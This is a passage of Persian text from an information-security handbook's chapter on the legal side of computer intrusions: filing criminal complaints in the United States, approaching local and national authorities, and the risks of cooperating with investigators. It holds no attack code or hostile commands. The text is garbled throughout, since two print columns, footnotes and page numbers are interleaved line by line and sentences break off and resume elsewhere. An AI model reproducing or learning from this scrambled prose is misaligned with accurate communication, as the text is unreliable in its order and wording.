‫‪ ١٣٠‬ﻳﻚ ﻣﺒﺎﺣﺜﺔ ﮔﺴﺘﺮﺩﻩﺗﺮ ﺩﺭ ﻣﻮﺭﺩ ﻣﺒﺎﺣﺚ ﺣﻘﻮﻗﻲ ﻭ ﻗـﺎﻧﻮﻧﻲ ﺩﺭ ﺍﻳـﺎﻻﺕ‬ ‫ﻣﺘﻌﺪﺩﻱ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻛﻪ ﺑﺘﻮﺍﻧﻴﺪ ﺍﺯ ﺁﻧﻬﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‪ .‬ﺍﻳﻦ‬
‫ﻣﺘﺤﺪﻩ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺩﺭ ﻛﺘﺎﺏ "ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ" ﻣﺸﺎﻫﺪﻩ ﻛﺮﺩ‪:‬‬ ‫ﻓﺼﻞ ﻧﻤﻲﺗﻮﺍﻧﺪ ﺷﻤﺎ ﺭﺍ ﺩﺭ ﺍﺳﺘﻔﺎﺩﺓ ﺩﻗﻴﻖ ﺍﺯ ﺟﻨﺒﻪﻫﺎﻱ ﻣﺨﺘﻠـﻒ‬
‫)‪A Crimefighter's Handbook (O'Reilly‬‬
‫ﻣﺎ ﺗﻮﺻﻴﻪ ﻣﻲﻛﻨﻴﻢ ﭼﻨﺎﻧﭽﻪ ﺩﺭ ﻣﻮﺭﺩ ﻣﻄﺎﻟﺒﻲ ﻛﻪ ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ ﺑﻪ ﺁﻧﻬـﺎ‬ ‫ﻗﺎﻧﻮﻥ ﻳﺎﺭﻱ ﻛﻨـﺪ‪ ،‬ﭼﺮﺍﻛـﻪ ﺩﺭ ﻗـﻮﺍﻧﻴﻦ ﻭ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﺣﻘـﻮﻗﻲ‬
‫ﺍﺷﺎﺭﻩ ﻣﻲﻛﻨﻴﻢ ﺑﻪ ﺗﻮﺿﻴﺤﺎﺕ ﺑﻴﺸﺘﺮﻱ ﻧﻴﺎﺯ ﺩﺍﺭﻳﺪ ﺑﻪ ﺍﻳﻦ ﻛﺘﺎﺏ ﻣﺮﺍﺟﻌﻪ‬ ‫ﻛﺸﻮﺭﻫﺎﻱ ﻣﺨﺘﻠﻒ ﺗﻔﺎﻭﺗﻬﺎﻱ ﺯﻳـﺎﺩﻱ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ‪ .‬ﻟـﺬﺍ ﺩﺭ ﺍﻳـﻦ‬
‫ﻛﻨﻴﺪ‪ .‬ﻛﺘﺎﺏ ﻓﻮﻕ ﺩﻳﮕﺮ ﺑﻪ ﭼﺎﭖ ﻧﻤﻲﺭﺳﺪ‪ ،‬ﻭﻟﻲ ﻛﭙﻲﻫﺎ ﻭ ﻧـﺴﺨﻪﻫـﺎﻱ‬
‫ﻗﺪﻳﻤﻲ ﺁﻥ ﻣﻮﺟﻮﺩ ﻫﺴﺘﻨﺪ‪.‬‬
‫ﻓﺼﻞ ﺑـﻪ ﭼﻴـﺰﻱ ﻓﺮﺍﺗـﺮ ﺍﺯ ﻗـﻮﺍﻧﻴﻦ ﺍﻳـﺎﻻﺕ ﻣﺘﺤـﺪﻩ ﻧﺨـﻮﺍﻫﻴﻢ‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪١٨٠‬‬

‫ﺁﻣﻮﺯﺵﺩﻳﺪﻩ ﻭ ﻧﻮﻉ ﻣﺤﻜﻮﻣﻴﺖ ﺗـﺼﻤﻴﻢ ﻣـﻲﮔﻴـﺮﺩ‪ .‬ﺑـﻪ ﺧـﺎﻃﺮ‬ ‫ﺍﮔﺮ ﻣﺪﻳﺮ ﺍﺟﺮﺍﻳﻲ ﻳﻚ ﺷﺮﻛﺖ ﺧـﺼﻮﺻﻲ ﺑﺎﺷـﻴﺪ‪ ،‬ﺣﺘـﻲ‬ ‫•‬
‫ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﺩﺳﺘﮕﺎﻩ ﻗﻀﺎﻳﻲ ﻣﻤﻠﻮ ﺍﺯ ﭘﺮﻭﻧﺪﻩﻫﺎﻱ ﮔﻮﻧـﺎﮔﻮﻥ‬ ‫ﺍﮔﺮ ﺷـﺮﻛﺖ ﻓﺎﻗـﺪ ﺳـﻬﺎﻣﺪﺍﺭ ﻫـﻢ ﺑﺎﺷـﺪ ﻣﻤﻜـﻦ ﺍﺳـﺖ‬
‫ﺍﺳﺖ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﺍﺣﺘﻤﺎﻝ ﺍﻧﺠﺎﻡ ﺗﺤﻘﻴﻘﺎﺕ ﺩﺭ ﭘﺮﻭﻧـﺪﻩﻫـﺎﻱ ﺟﺪﻳـﺪ‬ ‫ﺷﺮﻛﺘﻬﺎﻱ ﻫﻤﻜﺎﺭ‪ ،‬ﺣﺎﻣﻴﺎﻥ ﻭ ﻳـﺎ ﻣـﺸﺘﺮﻳﺎﻥ ‪ -‬ﺑـﺴﺘﻪ ﺑـﻪ‬
‫ﺩﺭﺻﻮﺭﺗﻲ ﻭﺟﻮﺩ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ ﻛﻪ ﻣﺮﺑﻮﻁ ﺑﻪ ﺟﺮﺍﺋﻢ ﺧﺎﺹ ﻭ ﻳـﺎ‬ ‫ﻗﻮﺍﻧﻴﻦ ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻫـﺮ ﻛـﺸﻮﺭ ‪ -‬ﺍﺯ ﺷـﻤﺎ ﺷـﻜﺎﻳﺖ‬
‫ﻼ ﺍﺣﺘﻤــﺎﻝ ﺍﻧﺠــﺎﻡ ﺗﺤﻘﻴﻘــﺎﺕ ﺩﺭ‬
‫ﺗﻬﺪﻳــﺪﺍﺕ ﺟــﺪﻱ ﺑﺎﺷــﻨﺪ‪ .‬ﻣــﺜ ﹰ‬ ‫ﻧﻤﺎﻳﻨﺪ‪.‬‬
‫ﭘﺮﻭﻧﺪﻩﺍﻱ ﻛﻪ ﺩﺭ ﺁﻥ ‪ ۲۰۰،۰۰۰‬ﺩﻻﺭ ﺩﺍﺩﻩ ﺍﺯ ﺑﻴﻦ ﺭﻓﺘـﻪ‪ ،‬ﺍﺯ ﻳـﻚ‬ ‫ﺍﮔﺮ ﺩﺭ ﻳﻚ ﺷﺮﻛﺖ ﻛﺎﺭ ﻣﻲﻛﻨﻴﺪ ﻭ ﻣﻲﺩﺍﻧﻴﺪ ﻛﻪ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﺑﻪ‬
‫ﻣﻮﺭﺩ ﻛﻪ ﺩﺭ ﺁﻥ ﻳﻜﻨﻔﺮ ﻣﻜﺮﺭﹰﺍ ﺍﺯ ﻃﺮﻳﻖ ﻣـﻮﺩﻡ‪ ،‬ﺭﺍﻳﺎﻧـﺔ ﺷﺨـﺼﻲ‬
‫ﺷﺪﺕ ﺩﺭ ﻣﻌﺮﺽ ﻣﺨﺎﻃﺮﻩ ﻗﺮﺍﺭﺩﺍﺭﺩ ﻗﺎﻋﺪﺗﹰﺎ ﺑﺎﻳﺪ ﺑﻌﻨـﻮﺍﻥ ﺑﺨـﺸﻲ‬
‫ﺷﻤﺎ ﺭﺍ ﭘﻮﻳﺶ ﻣﻲﻛﻨﺪ ﺑﺴﻴﺎﺭ ﺑﻴﺸﺘﺮ ﺍﺳﺖ‪.‬‬ ‫ﺍﺯ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﺍﻣﻨﻴﺘـﻲ )ﻗﺒـﻞ ﺍﺯ ﻭﻗـﻮﻉ ﺭﺧـﺪﺍﺩ ﺍﻣﻨﻴﺘـﻲ( ﺑـﺎ ﻣـﺸﺎﻭﺭ‬
‫ﺍﻃﻼﻋﺎﺕ ﺭﺍﺟﻊ ﺑﻪ ﺗﺤﻘﻴﻘﺎﺕ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﺷﻤﺎ ﺩﺍﺩﻩ ﺑﺸﻮﺩ ﻳـﺎ‬ ‫ﺣﻘﻮﻗﻲ ﺳﺎﺯﻣﺎﻥ ﺧﻮﺩ ﮔﻔﺘﮕﻮ ﻛﻨﻴﺪ‪ .‬ﺳﺎﺯﻣﺎﻧﻬﺎ ﺑﺴﺘﻪ ﺑﻪ ﺩﺧﺎﻟﺖ ﻳـﺎ‬
‫ﻧــﺸﻮﺩ‪ .‬ﺣﺘــﻲ ﻣﻤﻜــﻦ ﺍﺳــﺖ ﺩﺭ ﺟﺮﻳــﺎﻥ ﺗﺤﻘﻴﻘــﺎﺕ ﺍﻃﻼﻋــﺎﺕ‬ ‫ﻋﺪﻡ ﺩﺧﺎﻟﺖ ﻧﻴﺮﻭﻫﺎﻱ ﺍﻧﺘﻈﺎﻣﻲ ﺳﻴﺎﺳـﺘﻬﺎﻱ ﻣﺘﻔـﺎﻭﺗﻲ ﺭﺍ ﺍﺗﺨـﺎﺫ‬
‫ﻼ ﺩﺭﺣﺎﻟﻴﻜﻪ ﺑﺎﺯﺭﺳـﺎﻥ ﺷـﺪﻳﺪﹰﺍ‬
‫ﻧﺎﺩﺭﺳﺖ ﺑﻪ ﺷﻤﺎ ﺍﺭﺍﺋﻪ ﮔﺮﺩﺩ ‪ -‬ﻣﺜ ﹰ‬ ‫ﻣﻲ ﻛﻨﻨﺪ‪ .‬ﺑﺎ ﺗﻤﺮﻳﻦ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺯﻣﺎﻥ ﺑﺤﺮﺍﻥ‪ ،‬ﺍﺣﺘﻤﺎﻝ ﺩﻧﺒﺎﻝﺷﺪﻥ‬
‫ﻣﺸﻐﻮﻝ ﻛﺎﺭ ﻫﺴﺘﻨﺪ ﺑﻪ ﺷﻤﺎ ﮔﻔﺘﻪ ﺷﻮﺩ ﻫﻴﭽﮕﻮﻧﻪ ﺗﺤﻘﻴﻘـﺎﺗﻲ ﺩﺭ‬ ‫ﻭﺍﻗﻌﻲ ﺳﻴﺎﺳﺘﻬﺎ ﻫﻨﮕﺎﻣﻲ ﻛﻪ ﺑﻪ ﺁﻧﻬﺎ ﻧﻴﺎﺯ ﺍﺳﺖ ﺭﺍ ﺍﻓﺰﺍﻳﺶ ﺩﻫﻴﺪ‪.‬‬
‫ﻛﺎﺭ ﻧﻴﺴﺖ‪.‬‬
‫ﺑﻌﻨﻮﺍﻥ ﭼﻨﺪ ﻣﻘﺪﻣﻪ ﺑﺮﺍﻱ ﺷﺮﻭﻉ ﺑﺤﺚ‪ ،‬ﺍﻳﻦ ﻗﺴﻤﺖ ﻣـﺮﻭﺭﻱ ﺑـﺮ‬
‫ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺍﻧﺠﺎﻡ ﺗﺤﻘﻴﻘﺎﺕ‪ ،‬ﺷﻤﺎ ﺭﺍ ﺩﺭ ﻣـﻮﻗﻌﻴﺘﻲ‬ ‫ﭼﻨﺪ ﻣﺴﺌﻠﻪ ‪ -‬ﻛﻪ ﺑﻪ ﺍﺣﺘﻤﺎﻝ ﻗﻮﻱ ﺷﻤﺎ ﻧﻴﺰ ﺭﻭﺯﻱ ﺑﺎ ﺁﻥ ﻣﻮﺍﺟـﻪ‬
‫ﻧﺎﭘﺎﻳﺪﺍﺭ ﻗﺮﺍﺭ ﺩﻫﺪ‪ .‬ﺍﮔﺮ ﺍﻓﺮﺍﺩ ﻧﺎﺷﻨﺎﺱ ﺑﻪ ﻧﻔﻮﺫ ﺧـﻮﺩ ﺑـﻪ ﺳﻴـﺴﺘﻢ‬ ‫ﻣﻲﺷﻮﻳﺪ ‪ -‬ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ‪:‬‬
‫ﺷﻤﺎ ﺍﺩﺍﻣﻪ ﺩﻫﻨﺪ‪ ،‬ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﺮﺍﺟﻊ ﻗﺎﻧﻮﻧﻲ ﺍﺯ ﺷـﻤﺎ ﺑﺨﻮﺍﻫﻨـﺪ‬
‫ﻛﻪ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺭﺍ ﺑﺎﺯ ﺑﮕﺬﺍﺭﻳﺪ ﺗﺎ ﺑﺎﺯﺭﺳﺎﻥ ﺍﺗﺼﺎﻻﺕ ﺳﻴـﺴﺘﻢ ﺭﺍ‬ ‫ﺗﻨﻈﻴﻢ ﺷﻜﻮﺍﺋﻴﻪ ﺟﺰﺍﻳﻲ‬
‫ﺭﺩﻳﺎﺑﻲ ﻛﻨﻨﺪ ﻭ ﺑﺮﺍﻱ ﺩﺳﺘﮕﻴﺮﻱ ﻣﺘﻬﻢ ﺑـﻪ ﺟﻤـﻊﺁﻭﺭﻱ ﻣـﺪﺍﺭﻙ‬
‫ﺩﺭ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﻫﺮ ﺯﻣﺎﻥ ﻛﻪ ﺍﺣـﺴﺎﺱ ﻛﻨﻴـﺪ ﻛـﺴﻲ ﺧـﻼﻑ‬
‫ﺑﭙﺮﺩﺍﺯﻧــﺪ‪ .‬ﻣﺘﺄﺳــﻔﺎﻧﻪ ﺑﺎﺯﮔﺬﺍﺷــﺘﻦ ﺩﺭﻫــﺎﻱ ﺳﻴــﺴﺘﻢ ﺑﻌــﺪ ﺍﺯ‬
‫ﻗﺎﻧﻮﻥ ﻋﻤﻞﻛﺮﺩﻩ ﻣﻲﺗﻮﺍﻧﻴﺪ ﻋﻠﻴﻪ ﺍﻭ ﺍﻗﺪﺍﻡ ﻗﺎﻧﻮﻧﻲ ﻧﻤﺎﻳﻴﺪ ﻭ ﺍﻳـﻦ‬
‫ﻣﺸﺨﺺﺷﺪﻥ ﺍﻳﻨﻜﻪ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﻣﻮﺭﺩ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﺍﺭﺩ‪،‬‬
‫ﺭﻭﻧﺪ ﺑـﺎ ﺗﻨﻈـﻴﻢ ﺷـﻜﻮﺍﺋﻴﻪ ﻗـﻀﺎﻳﻲ ﺩﺭ ﻣﺮﺍﺟـﻊ ﺭﺳـﻤﻲ ﺷـﺮﻭﻉ‬
‫ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﻧﻔﻮﺫﮔﺮﺍﻥ ﺍﺯ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﺟﻬﺖ ﺍﻧﺠـﺎﻡ ﺧﺮﺍﺑﻜـﺎﺭﻱ‬
‫ﻣﻲﺷﻮﺩ‪ .‬ﺳﭙﺲ ﺍﺯ ﺩﺍﺩﻳﺎﺭ ﺍﺟﺎﺯﻩ ﮔﺮﻓﺘﻪ ﻣﻲﺷـﻮﺩ ﻛـﻪ ﺑـﺮ ﺍﺳـﺎﺱ‬
‫ﺭﻭﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺩﻳﮕﺮ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎ ﻳـﻚ ﺩﺍﺩﻧﺎﻣـﺔ‬
‫ﺍﺩﻋﺎﻱ ﺍﻧﺠﺎﻡﺷﺪﻩ ﺗﺤﻘﻴﻖ ﺑﻌﻤﻞ ﺁﻳﺪ ﻭ ﺍﮔﺮ ﺟﺮﻣﻲ ﺗﺸﺨﻴﺺ ﺩﺍﺩﻩ‬
‫ﺛﺎﻟﺚ ﺷﻤﺎ ﺭﺍ ﺩﺭ ﻣﻈﺎﻥ ﺍﺗﻬﺎﻡ ﻗـﺮﺍﺭ ﺩﻫـﺪ‪ ،‬ﭼﺮﺍﻛـﻪ ﻫﻤﻜـﺎﺭﻱ ﺑـﺎ‬
‫ﺷﺪ ﺑﺮ ﺍﺳﺎﺱ ﺁﻥ ﻳﻚ ﺩﺍﺩﺧﻮﺍﺳﺖ ﺗﻨﻈﻴﻢ ﺷﻮﺩ‪.‬‬
‫ﻧﻬﺎﺩﻫﺎﻱ ﻗﺎﻧﻮﻧﻲ ﻣﺎﻧﻊ ﺍﺯ ﻭﺍﺭﺩ ﺷﺪﻥ ﺍﺗﻬﺎﻡ ﺑﻪ ﺷﻤﺎ ﻧﻴـﺴﺖ‪ .‬ﭘـﺲ‬
‫ﺑﻬﺘﺮ ﺍﺳﺖ ﻗﺒﻞ ﺍﺯ ﭘـﺬﻳﺮﺵ ﭼﻨـﻴﻦ ﻣﺨـﺎﻃﺮﺍﺗﻲ ﺟﻮﺍﻧـﺐ ﺍﻣـﺮ ﺭﺍ‬ ‫ﺩﺭ ﺑﺮﺧﻲ ﻭ ﺷﺎﻳﺪ ﺍﻛﺜﺮ ﻣﻮﺍﺭﺩ‪ ،‬ﺗﺤﻘﻴﻘﺎﺕ ﺟﻨﺎﻳﻲ ﻧﺘﻴﺠـﻪﺍﻱ ﺑـﺮﺍﻱ‬
‫ﻼ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ‪.‬‬‫ﻛﺎﻣ ﹰ‬ ‫ﺷﻤﺎ ﺩﺭ ﭘﻲ ﻧﺪﺍﺭﺩ‪ .‬ﭼﻨﺎﻧﭽﻪ ﺍﻋﻤﺎﻝ ﻏﻴﺮﻗﺎﻧﻮﻧﻲ ﺍﻧﺠﺎﻡ ﺷﺪﻩ ﺗﻜـﺮﺍﺭ‬
‫ﻧﺸﻮﺩ ﻭ ﻧﻔﻮﺫﮔﺮ ﺭﺩﭘﺎﻳﻲ ﺍﺯ ﺧﻮﺩ ﺑـﺎﻗﻲ ﻧﮕﺬﺍﺷـﺘﻪ ﺑﺎﺷـﺪ‪ ،‬ﻳـﺎ ﺍﮔـﺮ‬
‫ﺗﻤﺎﺱ ﺑﺎ ﻣﺮﺍﺟﻊ ﻣﺮﺑﻮﻃﻪ‬ ‫ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﺍﺯ ﻳﻚ ﻛﺸﻮﺭ ﺧـﺎﺭﺟﻲ ﻣـﻮﺭﺩ ﺣﻤﻠـﻪ ﻗـﺮﺍﺭ ﮔﺮﻓﺘـﻪ‬
‫ﺩﺭ ﺯﻣﻴﻨﺔ ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺴﺘﻪ ﺑﻪ ﺍﻳﻨﻜﻪ ﭼﻪ ﻧﻮﻉ ﺳﻴﺴﺘﻢ ﻗﺎﻧﻮﻧﻲ‬ ‫ﺑﺎﺷﺪ‪ ،‬ﺑﺴﻴﺎﺭ ﺑﻌﻴﺪ ﺍﺳـﺖ ﻛـﻪ ﺑﺘﻮﺍﻧﻴـﺪ ﻧﻔـﻮﺫﮔﺮﺍﻥ ﺭﺍ ﺷﻨﺎﺳـﺎﻳﻲ ﻭ‬
‫ﻭ ﺟﺰﺍﺋﻲ ﺩﺭ ﻛﺸﻮﺭ ﺷﻤﺎ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻣﻤﻜﻦ ﺍﺳﺖ ﻻﺯﻡ ﺑﺎﺷﺪ ﻛـﻪ‬ ‫ﺩﺳﺘﮕﻴﺮ ﻛﻨﻴﺪ‪ .‬ﻧﻔﻮﺫﮔﺮﺍﻥ ﺣﺮﻓﻪﺍﻱ ﺑﻨﺪﺭﺕ ﺍﺯ ﺧﻮﺩ ﺭﺩ ﭘﺎﻳﻲ ﺑـﺎﻗﻲ‬
‫‪١٣١‬‬
‫ﺍﻗﺪﺍﻣﺎﺕ ﺧﺎﺻﻲ ﺭﺍ ﺟﻬﺖ ﺑﺮﻗﺮﺍﺭﻱ ﺗﻤﺎﺱ ﺑﺎ ﻣﺴﺌﻮﻟﻴﻦ ﻣﺤﻠﻲ ﻳـﺎ‬ ‫ﻣﻲﮔﺬﺍﺭﻧﺪ‪.‬‬
‫ﻼ ﺑﻌﻀﻲ ﺗﻮﺻﻴﻪﻫﺎﻱ ﻛﻠﻲ ﺁﻭﺭﺩﻩ ﺷـﺪﻩ‬ ‫ﻛﺸﻮﺭﻱ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ‪ .‬ﺫﻳ ﹰ‬
‫ﺗﻨﻈﻴﻢ ﻭ ﺍﺭﺍﺋﻪ ﺷﻜﻮﺍﺋﻴﻪ ﻟﺰﻭﻣﹰﺎ ﺑﻪ ﺗﻌﻘﻴﺐ ﻗﻀﺎﻳﻲ ﻣﻨﺠﺮ ﻧﻤﻲﺷﻮﺩ‪.‬‬
‫ﺍﻣﺎ ﻃﺒﻴﻌﺘﹰﺎ ﺍﮔﺮ ﺁﻧﻬﺎ ﺭﺍ ﻃﺒﻖ ﺭﻭﺷـﻬﺎﻱ ﻣﻨﺎﺳـﺐ ﻛـﺸﻮﺭ ﺧﻮﺩﺗـﺎﻥ‬
‫ﺩﺍﺩﻳﺎﺭ ﻣﺮﺑﻮﻃﻪ )ﺩﺭ ﺳﻄﻮﺡ ﻣﺨﺘﻠﻒ ﻛﺸﻮﺭﻱ‪ ،‬ﺍﻳﺎﻟﺘﻲ ﻳﺎ ﻣﺤﻠﻲ( ﺩﺭ ﻣـﻮﺭﺩ‬
‫ﺑﻜﺎﺭ ﺑﺒﺮﻳﺪ ﺗﺄﺛﻴﺮ ﺑﻴﺸﺘﺮﻱ ﺧﻮﺍﻫﻨﺪ ﺩﺍﺷﺖ‪.‬‬
‫ﻗــﺎﻧﻮﻥ ﻧﻘــﺾ ﺷــﺪﻩ‪ ،‬ﺷــﺪﺕ ﺟــﺮﻡ‪ ،‬ﻟــﺰﻭﻡ ﻫﻤﻜــﺎﺭﻱ ﺑﺎﺯﺭﺳــﺎﻥ‬
‫ﺍﮔﺮ ﺍﻣﻜﺎﻥ ﺁﻥ ﻭﺟﻮﺩ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﺪ ﺑﻬﺘـﺮ ﺍﺳـﺖ ﺍﻭﻝ ﺑـﻪ‬ ‫•‬
‫ﻣﺮﺍﺟﻊ ﻣﺤﻠﻲ ﻳﺎ ﺍﺳﺘﺎﻧﻲ ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ‪ .‬ﺍﮔﺮ ﻣﺮﺍﺟﻊ ﺍﺳﺘﺎﻧﻲ‬
‫‪ ۱۳۱‬ﺍﻟﺒﺘﻪ ﺗﻌﺪﺍﺩ ﺑﺴﻴﺎﺭ ﻛﻤﻲ ﺍﺯ ﻧﻔﻮﺫﮔﺮﺍﻥ ﻭﺍﻗﻌﹰﺎ ﺑﻪ ﺍﻧﺪﺍﺯﻩﺍﻱ ﺑﺎﻫﻮﺵ ﻫـﺴﺘﻨﺪ‬
‫ﺗﺸﺨﻴﺺ ﺩﻫﻨﺪ ﻛﻪ ﻣﺴﺌﻠﻪ ﺗﻮﺳﻂ ﻋﻮﺍﻣﻞ ﻛﺸﻮﺭﻱ ﺑﻬﺘـﺮ‬
‫ﻛﻪ ﺧﻮﺩﺷﺎﻥ ﻓﻜﺮ ﻣﻲﻛﻨﻨﺪ‪.‬‬
‫‪١٨١‬‬ ‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬

‫ﺩﺭ ﺣﺎﻻﺕ ﺩﻳﮕﺮ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺷﻤﺎ ﺻـﺮﻓﻨﻈﺮ ﻛﻨﻨـﺪ‬ ‫ﻣﻲﺗﻮﺍﻧﺪ ﻣﻮﺭﺩ ﺗﺤﻘﻴـﻖ ﻗـﺮﺍﺭ ﮔﻴـﺮﺩ ﺑـﻪ ﺷـﻤﺎ ﭘﻴـﺸﻨﻬﺎﺩ‬
‫ﺗﺎ ﻓﻘﺪﺍﻥ ﺍﻃﻼﻋﺎﺕ ﺧﻮﺩ ﺭﺍ ﺑﭙﻮﺷﺎﻧﻨﺪ ﻭ ﺍﺯ ﺯﻳﺮ ﺳﺆﺍﻝ ﺭﻓﺘﻦ ﺍﻋﺘﺒﺎﺭ‬ ‫ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺑﻪ ﺁﻧﻬﺎ ﻣﺮﺍﺟﻌـﻪ ﻧﻤﺎﻳﻴـﺪ‪ .‬ﻫﺮﭼﻨـﺪ ﻣﺘﺄﺳـﻔﺎﻧﻪ‬
‫ﺩﻭﺍﻳﺮ ﺍﺟﺮﺍﻱ ﻗﻮﺍﻧﻴﻦ ﺟﻠﻮﮔﻴﺮﻱ ﻧﻤﺎﻳﻨﺪ‪ .‬ﻻﺯﻡ ﺑﻪ ﺫﻛﺮ ﺍﺳﺖ ﻛﻪ ﺩﺭ‬ ‫ﻲ ﺍﺟـﺮﺍﻱ ﻗـﻮﺍﻧﻴﻦ ﻋﻼﻗـﻪﺍﻱ ﺑـﻪ‬ ‫ﺑﺮﺧﻲ ﺍﺯ ﺩﻭﺍﻳـﺮ ﻣﺤﻠـ ﹺ‬
‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﻮﺍﺭﺩ ﺍﻳﻦ ﺍﺣﺘﻤﺎﻝ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺧﻮﺩ ﻗﺮﺑﺎﻧﻲ ﻫﻢ ﺩﺭ‬ ‫ﻲ ﻣﺄﻣﻮﺭﺍﻥ ﻛﺸﻮﺭﻱ ﻧﺪﺍﺭﻧﺪ‪ .‬ﺍﻳـﻦ‬ ‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻧﻴﺮﻭﻱ ﻛﻤﻜ ﹺ‬
‫ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺟﻨﺎﻳﻲ ﻧﻘﺶ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ .‬ﻳـﻚ ﺑـﺎﺯﺭﺱ ﺑﺎﺗﺠﺮﺑـﻪ ﺩﺭ‬ ‫ﺍﻣﺮ ﻣﻤﻜﻦ ﺍﺳﺖ ﺳﺒﺐ ﺷﻮﺩ ﺭﺧـﺪﺍﺩ ﺍﻣﻨﻴﺘـﻲ ﻣﺮﺑـﻮﻁ ﺑـﻪ‬
‫ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ‪ ،‬ﺑﻪ ﻧﻈﺮﺍﺕ ﻗﺮﺑﺎﻧﻲ ﺍﻃﻤﻴﻨﺎﻥ ﻛﺎﻣﻞ ﻭ ﺑـﻲ ﺷـﻚ ﻭ‬ ‫ﺷﻤﺎ ﺑﺪﺭﺳﺘﻲ ﺗﺤﺖ ﺗﺤﻘﻴﻘﺎﺕ ﻗﺮﺍﺭ ﻧﮕﻴﺮﺩ‪.‬‬
‫ﺷﺒﻬﻪ ﻧﻤﻲﻧﻤﺎﻳﺪ؛ ﻭ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺑﺮﺍﻱ ﺟﺮﺍﺋﻢ ﺩﻧﻴـﺎﻱ ﺳـﺎﻳﺒﺮ ﻫـﻢ‬ ‫ﻣﺮﺍﺟﻊ ﻣﺤﻠﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑـﻪ ﭘﻴﮕﻴـﺮﻱ ﺷـﻜﺎﻳﺖ ﺷـﻤﺎ‬ ‫•‬
‫ﺻﺪﻕ ﻣﻲﻛﻨﺪ‪.‬‬ ‫ﻋﻼﻗﺔ ﺑﻴﺸﺘﺮﻱ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﻨﺪ؛ ﭼـﻮﻥ ﺑـﻪ ﺍﺣﺘﻤـﺎﻝ ﺯﻳـﺎﺩ‬
‫ﺍﮔﺮ ﺍﺯ ﺷﻤﺎ ﻭ ﻛﺎﺭﻣﻨﺪﺍﻧﺘﺎﻥ ﺧﻮﺍﺳﺘﻪ ﺷﺪ ﻛـﻪ ﺩﺭ ﻓﺮﺁﻳﻨـﺪ ﺗﺤﻘﻴـﻖ‬ ‫ﻣﺸﻜﻠﻲ ﻛﻪ ﺑﺮﺍﻱ ﺷﻤﺎ ﭘﻴﺶ ﺁﻣﺪﻩ ﺩﺭ ﻛﻨﺎﺭ ﻫﺰﺍﺭﺍﻥ ﻣـﻮﺭﺩ‬
‫ﺑﺮﺍﻱ ﻛﻤﻚ ﺑﻪ ﺷﻨﺎﺧﺖ ﻣﻮﺿـﻮﻉ ﻣـﺸﺎﺭﻛﺖ ﻧﻤﺎﺋﻴـﺪ‪ ،‬ﺍﻃﻤﻴﻨـﺎﻥ‬ ‫ﻣﺸﺎﺑﻪ ﺩﻳﮕﺮ )ﺑﻪ ﺁﻥ ﺍﻧﺪﺍﺯﻩ ﻛـﻪ ﺩﺭ ﺳـﻄﺢ ﻛـﺸﻮﺭﻱ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ(‬
